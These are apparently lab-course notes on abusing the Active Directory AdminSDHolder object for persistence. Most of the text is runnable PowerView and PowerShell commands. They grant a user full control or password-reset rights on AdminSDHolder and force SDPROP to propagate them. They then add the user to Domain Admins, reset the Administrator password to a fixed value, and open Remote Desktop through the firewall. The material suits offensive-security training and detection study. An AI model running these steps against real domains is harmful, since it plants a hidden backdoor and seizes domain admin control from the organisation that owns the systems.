Persistence ACL - AdminSDHolder

Resides in the System container of a domain and used to control the permissions - using an ACL - for certain built-in privileged groups ( called Protected Groups).

Security Descriptor Propagator (SDPROP) runs every hour and compares the ACL of protected groups and members with the ACL of AdminSDHolder and any differences are overwritten on the object ACL.

Well known abuse of some of the Protected Groups - All of the below can log on locally to DC

With DA privileges (Full Control/Write permissions) on the AdminSDHolder object, it can be used as a backdoor/persistence mechanism by adding a user with Full Permissions (or other interesting permissions) to the AdminSDHolder object.

In 60 minutes (when SDPROP runs), the user will be added with Full Control to the AC of groups like Domain Admins without actually being a member of it.

You need DA to do this

#First get DA
Import-Module powerview.ps1
#Add FullControl permissions for a user to the AdminSDHolder using PowerView as DA:
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights All -Verbose


#Other interesting permissions (ResetPassword, WriteMembers) 
#for a user to the AdminSDHolder:
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights ResetPassword -Verbose


#Create session to DC and load Invoke-SDPropagator.ps1 in the session
$sess = New-PSSession -ComputerName dcorp-dc
Invoke-Command -FilePath .\Invoke-SDPropagator.ps1 -Session $sess
Enter-PSSession -Session $sess


#Invoke Invoke-SDPropagator.ps1 from the session
Invoke-SDPropagator -ShowProgress -TimeoutMinutes 1 -Verbose
#For pre-Server 2008 machines:
Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose


#Check the Domain Admins Permission to see if our user is there now.
#PowerView as normal user:
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'student1'}


--------------Abusing if we were able to add ourself to Domain Admin ACL----------
#Check access before to see that you do not have access to DA
Get-NetGroupMember -GroupName "Domain Admins" -Recurse
#Abusing FullControl using PowerView_dev:
import-module .\powerview_dev.ps1
Add-DomainGroupMember -Identity 'Domain Admins' -Members studen529 -Verbose
#Check access to see that now you do have access to DA
Get-NetGroupMember -GroupName "Domain Admins" -Recurse


------------#Password Reset for any account----------
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student529 -Rights ResetPassword -Verbose
#Abusing ResetPassword using PowerView_dev:
Import-Module .\PowerView_dev.ps1
Set-DomainUserPassword -Identity Administrator -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose


#Enter Session with new password
Enter-PSSession –Computername dcorp-dc –credential dcorp\Administrator


----------#Extra-------
#Enable Remote Desktop
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
#Activate the firewall rule
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
#Enable authentication via RDP
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1

Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'student529'}